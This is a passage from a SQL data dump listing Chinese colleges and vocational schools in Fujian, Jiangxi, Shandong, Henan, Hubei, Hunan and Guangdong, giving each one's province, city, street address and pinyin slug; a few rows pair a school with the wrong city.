22:14:07',NULL,'yangguangxueyuan',0,'福州','经济技术开发区登龙路99号',0,NULL,NULL),(2752,'厦门大学嘉庚学院','福建','2017-09-12 15:30:18','2017-10-13 22:14:07',NULL,'shamendaxuejiagengxueyuan',0,'漳州','招商局经济技术开发区厦门大学(漳州市龙海市南滨大道)',0,NULL,NULL),(2753,'福州大学至诚学院','福建','2017-09-12 15:30:33','2017-10-13 22:14:07',NULL,'fuzhoudaxuezhichengxueyuan',0,'福州','鼓楼区杨桥西路50号',0,NULL,NULL),(2754,'集美大学诚毅学院','福建','2017-09-12 15:30:52','2017-10-13 22:14:07',NULL,'jimeidaxuechengyixueyuan',0,'厦门','集美区侨英街道兑山集美大道199号',0,NULL,NULL),(2755,'福建师范大学协和学院','福建','2017-09-12 15:31:21','2017-10-13 22:14:07',NULL,'fujianshifandaxuexiehexueyuan',0,'福州','闽侯县上街镇学园南路',0,NULL,NULL),(2756,'福州理工学院','福建','2017-09-12 15:36:08','2017-10-13 22:14:07',NULL,'fuzhouligongxueyuan',0,'福州','连江潘渡',0,NULL,NULL),(2757,'福建农林大学金山学院','福建','2017-09-12 15:36:43','2017-10-13 22:14:07',NULL,'fujiannonglindaxuejinshanxueyuan',0,'福州','金山',0,NULL,NULL),(2758,'泉州工艺美术职业学院','福建','2017-09-12 15:38:02','2017-10-13 22:14:07',NULL,'quanzhougongyimeishuzhiyexueyuan',0,'泉州','德化县学府路100号',0,NULL,NULL),(2759,'泉州海洋职业学院','福建','2017-09-12 15:38:25','2017-10-13 22:14:07',NULL,'quanzhouhaiyangzhiyexueyuan',0,'泉州','石狮市石狮大道',0,NULL,NULL),(2760,'泉州工程职业技术学院','福建','2017-09-12 15:38:57','2017-10-13 22:14:07',NULL,'quanzhougongchengzhiyejishuxueyuan',0,'泉州','南安市学园中路',0,NULL,NULL),(2761,'福州墨尔本理工职业学院','福建','2017-09-12 15:39:22','2017-10-13 22:14:07',NULL,'fuzhoumoerbenligongzhiyexueyuan',0,'福州','大学城文贤路1号',0,NULL,NULL),(2762,'江西工程学院','江西','2017-09-12 15:42:01','2017-10-13 22:14:07',NULL,'jiangxigongchengxueyuan',0,'新余','天工、仙来、仙女湖',0,NULL,NULL),(2763,'江西应用科技学院','江西','2017-09-12 15:42:29','2017-10-13 22:14:07',NULL,'jiangxiyingyongkejixueyuan',0,'南昌','新建联福大道001号',0,NULL,NULL),(2764,'南昌大学科学技术学院','江西','2017-09-12 15:43:06','2017-10-13 22:14:07',NULL,'nanchangdaxuekexuejishuxueyuan',0,'南昌','北京东路339号',0,NULL,NULL),(2765,'南昌大学共青学院','江西','2017-09-12 15:43:54','2017-10-13 22:14:07',NULL,'nanchangdaxuegongqingxueyuan',0,'南昌','南湖大道50号',0,NULL,NULL),(2766,'华东交通大学理工学院','江西','2017-09-12 15:44:52','2017-10-13 22:14:07',NULL,'huadongjiaotongdaxueligongxueyuan',0,'南昌','经济技术开发区广兰大道899号',0,NULL,NULL),(2767,'东华理工大学长江学院','江西','2017-09-12 15:45:33','2017-10-13 22:14:07',NULL,'donghualigongdaxuechangjiangxueyuan',0,'抚州','学府路56号',0,NULL,NULL),(2768,'南昌航空大学科技学院','江西','2017-09-12 15:45:54','2017-10-13 22:14:07',NULL,'nanchanghangkongdaxuekejixueyuan',0,'南昌','青山湖区上海路173号',0,NULL,NULL),(2769,'江西理工大学应用科学学院','江西','2017-09-12 15:46:13','2017-10-13 22:14:07',NULL,'jiangxiligongdaxueyingyongkexuexueyuan',0,'赣州','客家大道156号',0,NULL,NULL),(2770,'景德镇陶瓷大学科技艺术学院','江西','2017-09-12 15:46:49','2017-10-13 22:14:07',NULL,'jingdezhentaocidaxuekejiyishuxueyuan',0,'景德镇','陶阳南路',0,NULL,NULL),(2771,'江西农业大学南昌商学院','江西','2017-09-12 15:47:05','2017-10-13 22:14:07',NULL,'jiangxinongyedaxuenanchangshangxueyuan',0,'南昌','庐山中大道888号',0,NULL,NULL),(2772,'江西中医药大学科技学院','江西','2017-09-12 15:47:26','2017-10-13 22:14:07',NULL,'jiangxizhongyiyaodaxuekejixueyuan',0,'南昌','湾里区梅岭大道819号',0,NULL,NULL),(2773,'江西师范大学科学技术学院','江西','2017-09-12 15:47:45','2017-10-13 22:14:07',NULL,'jiangxishifandaxuekexuejishuxueyuan',0,'南昌','东湖区北京西路437号',0,NULL,NULL),(2774,'赣南师范大学科技学院','江西','2017-09-12 15:48:03','2017-10-13 22:14:07',NULL,'gannanshifandaxuekejixueyuan',0,'赣州','章贡区红旗大道61号',0,NULL,NULL),(2775,'江西科技师范大学理工学院','江西','2017-09-12 15:48:22','2017-10-13 22:14:07',NULL,'jiangxikejishifandaxueligongxueyuan',0,'南昌','新建县望城新区创业南路998号',0,NULL,NULL),(2776,'江西财经大学现代经济管理学院','江西','2017-09-12 15:48:45','2017-10-13 22:14:07',NULL,'jiangxicaijingdaxuexiandaijingjiguanlixueyuan',0,'南昌','昌北区枫林大道632号',0,NULL,NULL),(2777,'豫章师范学院','江西','2017-09-12 15:49:16','2017-10-13 22:14:07',NULL,'yuzhangshifanxueyuan',0,'南昌','梅岭大道1999号',0,NULL,NULL),(2778,'上饶幼儿师范高等专科学校','江西','2017-09-12 15:50:19','2017-10-13 22:14:07',NULL,'shangraoyouershifangaodengzhuankexuexiao',0,'上饶','信州区志敏东大道',0,NULL,NULL),(2779,'抚州幼儿师范高等专科学校','江西','2017-09-12 15:50:59','2017-10-13 22:14:07',NULL,'fuzhouyouershifangaodengzhuankexuexiao',0,'抚州','临川区王安石大道99号',0,NULL,NULL),(2780,'江西卫生职业学院','江西','2017-09-12 15:51:17','2017-10-13 22:14:07',NULL,'jiangxiweishengzhiyexueyuan',0,'南昌','小蓝经济开发区汇仁大道689号',0,NULL,NULL),(2781,'江西新能源科技职业学院','江西','2017-09-12 15:51:33','2017-10-13 22:14:07',NULL,'jiangxixinnengyuankejizhiyexueyuan',0,'新余','渝水区水西镇渝东大道818号',0,NULL,NULL),(2782,'江西传媒职业学院','江西','2017-09-12 15:51:54','2017-10-13 22:14:07',NULL,'jiangxichuanmeizhiyexueyuan',0,'南昌','南昌县蒋巷西大道266号',0,NULL,NULL),(2783,'宜春幼儿师范高等专科学校','江西','2017-09-12 15:53:46','2017-10-13 22:14:07',NULL,'yichunyouershifangaodengzhuankexuexiao',0,'宜春','高安市G320附近',0,NULL,NULL),(2784,'吉安职业技术学院','江西','2017-09-12 15:54:27','2017-10-13 22:14:07',NULL,'jianzhiyejishuxueyuan',0,'吉安','中心城区吉安南大道133号',0,NULL,NULL),(2785,'江西洪州职业学院','江西','2017-09-12 15:55:06','2017-10-13 22:14:07',NULL,'jiangxihongzhouzhiyexueyuan',0,'南昌','龙津湖总部经济基地大学城',0,NULL,NULL),(2786,'江西师范高等专科学校','江西','2017-09-12 15:55:22','2017-10-13 22:14:07',NULL,'jiangxishifangaodengzhuankexuexiao',0,'鹰潭','信江新区滨江东路1号',0,NULL,NULL),(2787,'南昌影视传播职业学院','江西','2017-09-12 15:55:59','2017-10-13 22:14:07',NULL,'nanchangyingshichuanbozhiyexueyuan',0,'南昌','蒋巷大道266号',0,NULL,NULL),(2788,'赣南卫生健康职业学院','江西','2017-09-12 15:56:19','2017-10-13 22:14:07',NULL,'gannanweishengjiankangzhiyexueyuan',0,'赣州','南康区经济技术开发区高校园区',0,NULL,NULL),(2789,'中国石油大学(华东)','山东','2017-09-12 15:57:27','2017-10-13 22:14:07',NULL,'zhongguoshiyoudaxuehuadong',0,'青岛','黄岛区长江西路66号',0,NULL,NULL),(2790,'齐鲁医药学院','山东','2017-09-12 15:58:08','2017-10-13 22:14:07',NULL,'qiluyiyaoxueyuan',0,'淄博','博山区经济技术开发区',0,NULL,NULL),(2791,'烟台大学文经学院','山东','2017-09-12 16:01:44','2017-10-13 22:14:07',NULL,'yantaidaxuewenjingxueyuan',0,'烟台',' 莱山区港城东大街100号 ',0,NULL,NULL),(2792,'聊城大学东昌学院','山东','2017-09-12 16:02:23','2017-10-13 22:14:07',NULL,'liaochengdaxuedongchangxueyuan',0,'聊城','经济开发区黄河路105号',0,NULL,NULL),(2793,'青岛理工大学琴岛学院','山东','2017-09-12 16:03:16','2017-10-13 22:14:07',NULL,'qingdaoligongdaxueqindaoxueyuan',0,'青岛','城阳区铁骑山路79号',0,NULL,NULL),(2794,'山东师范大学历山学院','山东','2017-09-12 16:03:45','2017-10-13 22:14:07',NULL,'shandongshifandaxuelishanxueyuan',0,'济南','云门山南路9888号 ',0,NULL,NULL),(2795,'山东财经大学燕山学院','山东','2017-09-12 16:04:25','2017-10-13 22:14:07',NULL,'shandongcaijingdaxueyanshanxueyuan',0,'济南','经十东路东首大学路1686号',0,NULL,NULL),(2796,'中国石油大学胜利学院','山东','2017-09-12 16:05:08','2017-10-13 22:14:07',NULL,'zhongguoshiyoudaxueshenglixueyuan',0,'东营','北二路271号',0,NULL,NULL),(2797,'山东科技大学泰山科技学院','山东','2017-09-12 16:05:39','2017-10-13 22:14:07',NULL,'shandongkejidaxuetaishankejixueyuan',0,'泰安','岱宗大街223号',0,NULL,NULL),(2798,'青岛农业大学海都学院','山东','2017-09-12 16:11:54','2017-10-13 22:14:07',NULL,'qingdaonongyedaxuehaiduxueyuan',0,'烟台','莱阳市文化路65号',0,NULL,NULL),(2799,'齐鲁理工学院','山东','2017-09-12 16:20:01','2017-10-13 22:14:07',NULL,'qiluligongxueyuan',0,'济南','经十东路3028号',0,NULL,NULL),(2800,'山东财经大学东方学院','山东','2017-09-12 16:21:04','2017-10-13 22:14:07',NULL,'shandongcaijingdaxuedongfangxueyuan',0,'泰安','高新区文化区',0,NULL,NULL),(2801,'济南大学泉城学院','山东','2017-09-12 16:21:47','2017-10-13 22:14:07',NULL,'jinandaxuequanchengxueyuan',0,'蓬莱','海滨西路34号',0,NULL,NULL),(2802,'北京电影学院现代创意媒体学院','山东','2017-09-12 16:22:30','2017-10-13 22:14:07',NULL,'beijingdianyingxueyuanxiandaichuangyimeitixueyuan',0,'青岛','经济技术开发区金沙滩路689号',0,NULL,NULL),(2803,'东营科技职业学院','山东','2017-09-12 16:22:54','2017-10-13 22:14:07',NULL,'dongyingkejizhiyexueyuan',0,'东营','大王经济开发区泰山路7号 ',0,NULL,NULL),(2804,'山东轻工职业学院','山东','2017-09-12 16:23:46','2017-10-13 22:14:07',NULL,'shandongqinggongzhiyexueyuan',0,'淄博','周村区米山路30号',0,NULL,NULL),(2805,'山东艺术设计职业学院','山东','2017-09-12 16:24:10','2017-10-13 22:14:07',NULL,'shandongyishushejizhiyexueyuan',0,'济南','历山北路黄台山庄109号',0,NULL,NULL),(2806,'威海海洋职业学院','山东','2017-09-12 16:24:41','2017-10-13 22:14:07',NULL,'weihaihaiyangzhiyexueyuan',0,'威海','海湾南路1000号',0,NULL,NULL),(2807,'山东特殊教育职业学院','山东','2017-09-12 16:25:02','2017-10-13 22:14:07',NULL,'shandongteshujiaoyuzhiyexueyuan',0,'济南','南辛庄西路326号 ',0,NULL,NULL),(2808,'烟台黄金职业学院','山东','2017-09-12 16:25:27','2017-10-13 22:14:07',NULL,'yantaihuangjinzhiyexueyuan',0,'烟台','招远市辛庄镇金海大道996号',0,NULL,NULL),(2809,'日照航海工程职业学院','山东','2017-09-12 16:25:47','2017-10-13 22:14:07',NULL,'rizhaohanghaigongchengzhiyexueyuan',0,'日照','大学科技园山海路369号',0,NULL,NULL),(2810,'河南中医药大学','河南','2017-09-12 16:26:20','2017-10-13 22:14:07',NULL,'henanzhongyiyaodaxue',0,'郑州','金水区金水路1号',0,NULL,NULL),(2811,'郑州工程技术学院','河南','2017-09-12 16:26:37','2017-10-13 22:14:07',NULL,'zhengzhougongchengjishuxueyuan',0,'郑州','大学城北区英才街6号',0,NULL,NULL),(2812,'河南工学院','河南','2017-09-12 16:26:55','2017-10-13 22:14:07',NULL,'henangongxueyuan',0,'新乡','平原路699号',0,NULL,NULL),(2813,'郑州工业应用技术学院','河南','2017-09-12 16:27:25','2017-10-13 22:14:07',NULL,'zhengzhougongyeyingyongjishuxueyuan',0,'郑州','新郑市中华北路',0,NULL,NULL),(2814,'郑州财经学院','河南','2017-09-12 16:33:05','2017-10-13 22:14:07',NULL,'zhengzhoucaijingxueyuan',0,'郑州','惠济区天河路36号',0,NULL,NULL),(2815,'黄河交通学院','河南','2017-09-12 16:33:37','2017-10-13 22:14:07',NULL,'huanghejiaotongxueyuan',0,'焦作','黄河北岸武陟迎宾大道',0,NULL,NULL),(2816,'河南大学民生学院','河南','2017-09-12 16:35:36','2017-10-13 22:14:07',NULL,'henandaxueminshengxueyuan',0,'开封','金明大道北段',0,NULL,NULL),(2817,'河南师范大学新联学院','河南','2017-09-12 16:35:52','2017-10-13 22:14:07',NULL,'henanshifandaxuexinlianxueyuan',0,'郑州','郑东新区职业教育园区',0,NULL,NULL),(2818,'信阳学院','河南','2017-09-12 16:36:17','2017-10-13 22:14:07',NULL,'xinyangxueyuan',0,'信阳','南湖路237号',0,NULL,NULL),(2819,'安阳学院','河南','2017-09-12 16:36:38','2017-10-13 22:14:07',NULL,'anyangxueyuan',0,'安阳','中华路南段599号',0,NULL,NULL),(2820,'新乡医学院三全学院','河南','2017-09-12 16:37:25','2017-10-13 22:14:07',NULL,'xinxiangyixueyuansanquanxueyuan',0,'新乡','向阳路东段688号平原校区:河南省新乡市平原新区长江大道西段',0,NULL,NULL),(2821,'河南科技学院新科学院','河南','2017-09-12 16:37:59','2017-10-13 22:14:07',NULL,'henankejixueyuanxinkexueyuan',0,'新乡','红旗区新中大道中段',0,NULL,NULL),(2822,'郑州工商学院','河南','2017-09-12 16:38:26','2017-10-13 22:14:07',NULL,'zhengzhougongshangxueyuan',0,'郑州','郑东新区前程路8号',0,NULL,NULL),(2823,'中原工学院信息商务学院','河南','2017-09-12 16:39:13','2017-10-13 22:14:07',NULL,'zhongyuangongxueyuanxinxishangwuxueyuan',0,'郑州','新郑市双湖大道2号',0,NULL,NULL),(2824,'河南应用技术职业学院','河南','2017-09-12 16:39:53','2017-10-13 22:14:07',NULL,'henanyingyongjishuzhiyexueyuan',0,'郑州','中原区郑上路548号',0,NULL,NULL),(2825,'中国地质大学(武汉)','湖北','2017-09-12 16:40:10','2017-10-13 22:14:07',NULL,'zhongguodizhidaxuewuhan',0,'武汉','洪山区鲁磨路388号',1,NULL,'2018-01-01 10:00:00'),(2826,'汉江师范学院','湖北','2017-09-12 16:40:40','2017-10-13 22:14:07',NULL,'hanjiangshifanxueyuan',0,'十堰','北京南路18号',0,NULL,NULL),(2827,'武昌首义学院','湖北','2017-09-12 16:40:58','2017-10-13 22:14:07',NULL,'wuchangshouyixueyuan',0,'武汉','洪山区南李路22号',0,NULL,NULL),(2828,'武汉晴川学院','湖北','2017-09-12 16:41:41','2017-10-13 22:14:07',NULL,'wuhanqingchuanxueyuan',0,'武汉','东湖新技术开发区华中科技产业园',0,NULL,NULL),(2829,'湖北大学知行学院','湖北','2017-09-12 16:42:11','2017-10-13 22:14:07',NULL,'hubeidaxuezhixingxueyuan',0,'武汉','谌家矶街兴盛路特一号',0,NULL,NULL),(2830,'武汉科技大学城市学院','湖北','2017-09-12 16:42:31','2017-10-13 22:14:07',NULL,'wuhankejidaxuechengshixueyuan',0,'武汉','东湖生态旅游风景区黄家大湾特1号',0,NULL,NULL),(2831,'三峡大学科技学院','湖北','2017-09-12 16:42:50','2017-10-13 22:14:07',NULL,'sanxiadaxuekejixueyuan',0,'宜昌','西陵区大学路18号',0,NULL,NULL),(2832,'江汉大学文理学院','湖北','2017-09-12 16:43:08','2017-10-13 22:14:07',NULL,'jianghandaxuewenlixueyuan',0,'武汉','黄陂区胜海大道特一号',0,NULL,NULL),(2833,'湖北工业大学工程技术学院','湖北','2017-09-12 16:44:39','2017-10-13 22:14:07',NULL,'hubeigongyedaxuegongchengjishuxueyuan',0,'武汉','洪山区狮子山街南李路28—1号',0,NULL,NULL),(2834,'武汉工程大学邮电与信息工程学院','湖北','2017-09-12 16:45:17','2017-10-13 22:14:07',NULL,'wuhangongchengdaxueyoudianyuxinxigongchengxueyuan',0,'武汉','虎泉街366号',0,NULL,NULL),(2835,'武汉纺织大学外经贸学院','湖北','2017-09-12 16:45:35','2017-10-13 22:14:07',NULL,'wuhanfangzhidaxuewaijingmaoxueyuan',0,'武汉','东湖梨园渔光村特一号',0,NULL,NULL),(2836,'武汉工商学院','湖北','2017-09-12 16:46:16','2017-10-13 22:14:07',NULL,'wuhangongshangxueyuan',0,'武汉','洪山区黄家湖西路3号',0,NULL,NULL),(2837,'长江大学工程技术学院','湖北','2017-09-12 16:46:37','2017-10-13 22:14:07',NULL,'changjiangdaxuegongchengjishuxueyuan',0,'荆州','学苑路85号',0,NULL,NULL),(2838,'长江大学文理学院','湖北','2017-09-12 16:46:57','2017-10-13 22:14:07',NULL,'changjiangdaxuewenlixueyuan',0,'荆州','郢都路27号',0,NULL,NULL),(2839,'湖北商贸学院','湖北','2017-09-12 16:47:30','2017-10-13 22:14:07',NULL,'hubeishangmaoxueyuan',0,'武汉','雄楚大道634',0,NULL,NULL),(2840,'湖北汽车工业学院科技学院','湖北','2017-09-12 16:47:53','2017-10-13 22:14:07',NULL,'hubeiqichegongyexueyuankejixueyuan',0,'十堰','茅箭区天津路46号',0,NULL,NULL),(2841,'湖北医药学院药护学院','湖北','2017-09-12 16:48:13','2017-10-13 22:14:07',NULL,'hubeiyiyaoxueyuanyaohuxueyuan',0,'十堰','人民南路30号',0,NULL,NULL),(2842,'湖北民族学院科技学院','湖北','2017-09-12 16:48:36','2017-10-13 22:14:07',NULL,'hubeiminzuxueyuankejixueyuan',0,'恩施','学院路39号',0,NULL,NULL),(2843,'湖北经济学院法商学院','湖北','2017-09-12 16:48:58','2017-10-13 22:14:07',NULL,'hubeijingjixueyuanfashangxueyuan',0,'武汉','江夏区藏龙岛开发区杨桥湖大道8号',0,NULL,NULL),(2844,'武汉体育学院体育科技学院','湖北','2017-09-12 16:49:30','2017-10-13 22:14:07',NULL,'wuhantiyuxueyuantiyukejixueyuan',0,'武汉','江夏区藏龙岛科技园环岛路1号',0,NULL,NULL),(2845,'湖北师范大学文理学院','湖北','2017-09-12 16:50:04','2017-10-13 22:14:07',NULL,'hubeishifandaxuewenlixueyuan',0,'黄石','经济技术开发区金山大道东',0,NULL,NULL),(2846,'湖北文理学院理工学院','湖北','2017-09-12 16:50:22','2017-10-13 22:14:07',NULL,'hubeiwenlixueyuanligongxueyuan',0,'襄阳','襄城区尹集东街28号',0,NULL,NULL),(2847,'湖北工程学院新技术学院','湖北','2017-09-12 16:50:43','2017-10-13 22:14:07',NULL,'hubeigongchengxueyuanxinjishuxueyuan',0,'孝感','学院路158号',0,NULL,NULL),(2848,'文华学院','湖北','2017-09-12 16:53:48','2017-10-13 22:14:07',NULL,'wenhuaxueyuan',0,'武汉','东湖高新技术开发区文华园路8号',0,NULL,NULL),(2849,'武汉学院','湖北','2017-09-12 16:54:03','2017-10-13 22:14:07',NULL,'wuhanxueyuan',0,'武汉','江夏区黄家湖大道333号',0,NULL,NULL),(2850,'武汉工程科技学院','湖北','2017-09-12 16:54:26','2017-10-13 22:14:07',NULL,'wuhangongchengkejixueyuan',0,'武汉','江夏区熊廷弼路特八号',0,NULL,NULL),(2851,'武汉华夏理工学院','湖北','2017-09-12 16:54:50','2017-10-13 22:14:07',NULL,'wuhanhuaxialigongxueyuan',0,'武汉','东湖新技术开发区关山大道589号',0,NULL,NULL),(2852,'武汉传媒学院','湖北','2017-09-12 16:55:06','2017-10-13 22:14:07',NULL,'wuhanchuanmeixueyuan',0,'武汉','江夏区藏龙岛凤凰大道2号',0,NULL,NULL),(2853,'武汉设计工程学院','湖北','2017-09-12 16:55:40','2017-10-13 22:14:07',NULL,'wuhanshejigongchengxueyuan',0,'武汉','江夏区藏龙岛开发区',0,NULL,NULL),(2854,'湖北工程职业学院','湖北','2017-09-12 16:56:06','2017-10-13 22:14:07',NULL,'hubeigongchengzhiyexueyuan',0,'黄石','下陆区广州路9号',0,NULL,NULL),(2855,'湖北铁道运输职业学院','湖北','2017-09-12 16:56:24','2017-10-13 22:14:07',NULL,'hubeitiedaoyunshuzhiyexueyuan',0,'武汉','狮子山街钢狮咀1号',0,NULL,NULL),(2856,'武汉海事职业学院','湖北','2017-09-12 16:56:39','2017-10-13 22:14:07',NULL,'wuhanhaishizhiyexueyuan',0,'武汉','黄陂区滠口街十里棚',0,NULL,NULL),(2857,'长江艺术工程职业学院','湖北','2017-09-12 16:56:59','2017-10-13 22:14:07',NULL,'changjiangyishugongchengzhiyexueyuan',0,'荆州','北京东路特1号',0,NULL,NULL),(2858,'荆门职业学院','湖北','2017-09-12 16:57:19','2017-10-13 22:14:07',NULL,'jingmenzhiyexueyuan',0,'荆门','掇刀区军马场路3号',0,NULL,NULL),(2859,'武汉铁路桥梁职业学院','湖北','2017-09-12 16:57:36','2017-10-13 22:14:07',NULL,'wuhantieluqiaoliangzhiyexueyuan',0,'武汉','经济技术开发区(汉南)东荆街马影河大道66号',0,NULL,NULL),(2860,'武汉光谷职业学院','湖北','2017-09-12 16:58:09','2017-10-13 22:14:07',NULL,'wuhanguangguzhiyexueyuan',0,'武汉','洪山区雄楚大街666号',0,NULL,NULL),(2861,'湖南医药学院','湖南','2017-09-12 16:58:28','2017-10-13 22:14:07',NULL,'hunanyiyaoxueyuan',0,'怀化','锦溪南路492号',0,NULL,NULL),(2862,'湖南工业大学科技学院','湖南','2017-09-12 16:58:55','2017-10-13 22:14:07',NULL,'hunangongyedaxuekejixueyuan',0,'株洲','文化路',0,NULL,NULL),(2863,'湖南科技大学潇湘学院','湖南','2017-09-12 16:59:16','2017-10-13 22:14:07',NULL,'hunankejidaxuexiaoxiangxueyuan',0,'湘潭','桃园路',1,NULL,'2018-01-01 10:00:00'),(2864,'南华大学船山学院','湖南','2017-09-12 16:59:37','2017-10-13 22:14:07',NULL,'nanhuadaxuechuanshanxueyuan',0,'衡阳','常胜西路 ',0,NULL,NULL),(2865,'湖南师范大学树达学院','湖南','2017-09-12 16:59:51','2017-10-13 22:14:07',NULL,'hunanshifandaxueshudaxueyuan',0,'长沙','岳麓区桃花坪1号',1,NULL,'2018-01-01 10:00:00'),(2866,'湖南农业大学东方科技学院','湖南','2017-09-12 17:00:09','2017-10-13 22:14:07',NULL,'hunannongyedaxuedongfangkejixueyuan',0,'长沙','芙蓉区农大路一号',0,NULL,NULL),(2867,'中南林业科技大学涉外学院','湖南','2017-09-12 17:00:31','2017-10-13 22:14:07',NULL,'zhongnanlinyekejidaxueshewaixueyuan',0,'长沙','望城区丁字镇',0,NULL,NULL),(2868,'湖南文理学院芙蓉学院','湖南','2017-09-12 17:01:08','2017-10-13 22:14:07',NULL,'hunanwenlixueyuanfurongxueyuan',0,'常德','武陵区城东高专路2号',0,NULL,NULL),(2869,'湖南理工学院南湖学院','湖南','2017-09-12 17:08:57','2017-10-13 22:14:07',NULL,'hunanligongxueyuannanhuxueyuan',0,'岳阳','学院路',0,NULL,NULL),(2870,'衡阳师范学院南岳学院','湖南','2017-09-12 17:10:39','2017-10-13 22:14:07',NULL,'hengyangshifanxueyuannanyuexueyuan',0,'衡阳','黄白路179号',0,NULL,NULL),(2871,'湖南工程学院应用技术学院','湖南','2017-09-12 17:11:28','2017-10-13 22:14:07',NULL,'hunangongchengxueyuanyingyongjishuxueyuan',0,'长沙','岳塘区书院路17号',0,NULL,NULL),(2872,'湖南中医药大学湘杏学院','湖南','2017-09-12 17:14:42','2017-10-13 22:14:07',NULL,'hunanzhongyiyaodaxuexiangxingxueyuan',0,'长沙','韶山中路113号',0,NULL,NULL),(2873,'吉首大学张家界学院','湖南','2017-09-12 17:15:20','2017-10-13 22:14:07',NULL,'jishoudaxuezhangjiajiexueyuan',0,'长沙','家界市永定区温泉路(热水坑)001号',0,NULL,NULL),(2874,'长沙理工大学城南学院','湖南','2017-09-12 17:15:39','2017-10-13 22:14:07',NULL,'changshaligongdaxuechengnanxueyuan',0,'长沙','天心区赤岭路45号',0,NULL,NULL),(2875,'湖南应用技术学院','湖南','2017-09-12 17:15:55','2017-10-13 22:14:07',NULL,'hunanyingyongjishuxueyuan',0,'常德','鼎城区善卷路1027号',0,NULL,NULL),(2876,'湖南交通工程学院','湖南','2017-09-12 17:17:02','2017-10-13 22:14:07',NULL,'hunanjiaotonggongchengxueyuan',0,'衡阳','蒸湘区呆鹰岭',0,NULL,NULL),(2877,'湘中幼儿师范高等专科学校','湖南','2017-09-12 17:17:23','2017-10-13 22:14:07',NULL,'xiangzhongyouershifangaodengzhuankexuexiao',0,'邵阳','大祥区学院路街道',0,NULL,NULL),(2878,'湘潭医卫职业技术学院','湖南','2017-09-12 17:17:49','2017-10-13 22:14:07',NULL,'xiangtanyiweizhiyejishuxueyuan',0,'湘潭','丝绸中路6号',0,NULL,NULL),(2879,'湖南财经工业职业技术学院','湖南','2017-09-12 17:18:07','2017-10-13 22:14:07',NULL,'hunancaijinggongyezhiyejishuxueyuan',0,'衡阳','珠晖区狮山路20号',0,NULL,NULL),(2880,'湖南汽车工程职业学院','湖南','2017-09-12 17:18:31','2017-10-13 22:14:07',NULL,'hunanqichegongchengzhiyexueyuan',0,'株洲','红旗北路476号',0,NULL,NULL),(2881,'湖南国防工业职业技术学院','湖南','2017-09-12 17:19:00','2017-10-13 22:14:07',NULL,'hunanguofanggongyezhiyejishuxueyuan',0,'湘潭','雨湖区楠竹山学院路',0,NULL,NULL),(2882,'湘南幼儿师范高等专科学校','湖南','2017-09-12 17:19:21','2017-10-13 22:14:07',NULL,'xiangnanyouershifangaodengzhuankexuexiao',0,'郴州','南岭大道180号',0,NULL,NULL),(2883,'湖南劳动人事职业学院','湖南','2017-09-12 17:19:40','2017-10-13 22:14:07',NULL,'hunanlaodongrenshizhiyexueyuan',0,'长沙','经济技术开发区星沙产业基地开元东路1319号',0,NULL,NULL),(2884,'广东医科大学','广东','2017-09-12 17:21:26','2017-10-13 22:14:07',NULL,'guangdongyikedaxue',0,'湛江','松山湖新城大道1号',0,NULL,NULL),(2885,'广东药科大学','广东','2017-09-12 17:21:57','2017-10-13 22:14:07',NULL,'guangdongyaokedaxue',0,'广州','学城外环东路280号',0,NULL,NULL),(2886,'岭南师范学院','广东','2017-09-12 17:22:34','2017-10-13 22:14:07',NULL,'lingnanshifanxueyuan',0,'湛江','赤坎区寸金路29号',0,NULL,NULL),(2887,'电子科技大学中山学院','广东','2017-09-12 17:22:57','2017-10-13 22:14:07',NULL,'dianzikejidaxuezhongshanxueyuan',0,'中山','石岐区学院路1号',0,NULL,NULL),(2888,'华南理工大学广州学院','广东','2017-09-12 17:23:38','2017-10-13 22:14:07',NULL,'huananligongdaxueguangzhouxueyuan',0,'广州','花都区学府路一号',0,NULL,NULL),(2889,'广州大学华软软件学院','广东','2017-09-12 17:23:56','2017-10-13 22:14:07',NULL,'guangzhoudaxuehuaruanruanjianxueyuan',0,'广州','从化区广从南路548号',0,NULL,NULL),(2890,'中山大学南方学院','广东','2017-09-12 17:24:14','2017-10-13 22:14:07',NULL,'zhongshandaxuenanfangxueyuan',0,'广州','从化区温泉大道882号',0,NULL,NULL),(2891,'广东外语外贸大学南国商学院','广东','2017-09-12 17:24:29','2017-10-13 22:14:07',NULL,'guangdongwaiyuwaimaodaxuenanguoshangxueyuan',0,'广州','白云区良田中路181号',0,NULL,NULL),(2892,'广东财经大学华商学院','广东','2017-09-12 17:25:01','2017-10-13 22:14:07',NULL,'guangdongcaijingdaxuehuashangxueyuan',0,'广州','增城区荔新大道华商路一号',0,NULL,NULL),(2893,'广东海洋大学寸金学院','广东','2017-09-12 17:25:24','2017-10-13 22:14:07',NULL,'guangdonghaiyangdaxuecunjinxueyuan',0,'湛江','麻章区学智路2号(本校区)广东省湛江市湛江教育基地(新校区)',0,NULL,NULL),(2894,'华南农业大学珠江学院','广东','2017-09-12 17:25:53','2017-10-13 22:14:07',NULL,'huanannongyedaxuezhujiangxueyuan',0,'广州','从化区街口街广从北路',0,NULL,NULL),(2895,'广东技术师范学院天河学院','广东','2017-09-12 17:26:10','2017-10-13 22:14:07',NULL,'guangdongjishushifanxueyuantianhexueyuan',0,'广州','白云区太和兴太三路',0,NULL,NULL),(2896,'北京师范大学珠海分校','广东','2017-09-12 17:26:44','2017-10-13 22:14:07',NULL,'beijingshifandaxuezhuhaifenxiao',0,'珠海','唐家湾金凤路18号',0,NULL,NULL),(2897,'广东工业大学华立学院','广东','2017-09-12 17:27:01','2017-10-13 22:14:07',NULL,'guangdonggongyedaxuehualixueyuan',0,'广州','增城区华立路11号',0,NULL,NULL),(2898,'广州大学松田学院','广东','2017-09-12 17:27:19','2017-10-13 22:14:07',NULL,'guangzhoudaxuesongtianxueyuan',0,'广州','增城区朱村街朱村大道东',0,NULL,NULL),(2899,'广州商学院','广东','2017-09-12 17:27:35','2017-10-13 22:14:07',NULL,'guangzhoushangxueyuan',0,'广州','萝岗区九龙镇',0,NULL,NULL),(2900,'北京理工大学珠海学院','广东','2017-09-12 17:27:55','2017-10-13 22:14:07',NULL,'beijingligongdaxuezhuhaixueyuan',0,'珠海','唐家湾金凤路6号 ',0,NULL,NULL),(2901,'吉林大学珠海学院','广东','2017-09-12 17:28:14','2017-10-13 22:14:07',NULL,'jilindaxuezhuhaixueyuan',0,'珠海','金湾区草堂湾 ',0,NULL,NULL),(2902,'广州工商学院','广东','2017-09-12 17:29:08','2017-10-13 22:14:07',NULL,'guangzhougongshangxueyuan',0,'广州','花都区狮岭镇海布光明路5号',0,NULL,NULL),(2903,'广东理工学院','广东','2017-09-12 17:29:36','2017-10-13 